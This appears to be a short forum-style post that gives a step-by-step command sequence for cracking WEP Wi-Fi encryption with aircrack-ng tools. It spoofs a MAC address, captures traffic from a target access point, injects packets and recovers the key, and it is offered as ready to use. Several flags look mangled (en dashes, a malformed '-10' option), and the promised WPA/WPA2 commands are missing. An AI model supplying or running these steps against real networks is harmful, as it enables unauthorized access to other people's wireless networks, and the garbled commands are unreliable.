
For those of you who where looking for the commmands to hack WEP and WPA/WPA2 here are the comands to do so: They Are As Follows
#WEP Cracking#
===================================================================
Open 3 Konsoles or 3 Tabs in one Konsole
- airmon-ng stop (eth1/ath1)
- ifconfig (eth1/ath1) down
- macchanger –mac 00:22:33:44:55:66 (eth1/ath1)
- airmon-ng start (eth1/ath1)
- airodump-ng (eth1/ath1)
- Ctrl+C to Stop and Copy the particular Access Point’s (bssid) of Target
- airodump-ng -c (channel) -w Exidous –bssid (bssid) (eth1/ath1)
- aireplay-ng -10 -a (bssid) -h 00:22:33:44:55:66 (eth1/ath1)
- aireplay-ng -3 -b (bssid) -h 00:22:33:44:55:66 (eth1/ath1)
- aircrack-ng -n 64 –bssid (bssid) Exidous-01.cap
===================================================================
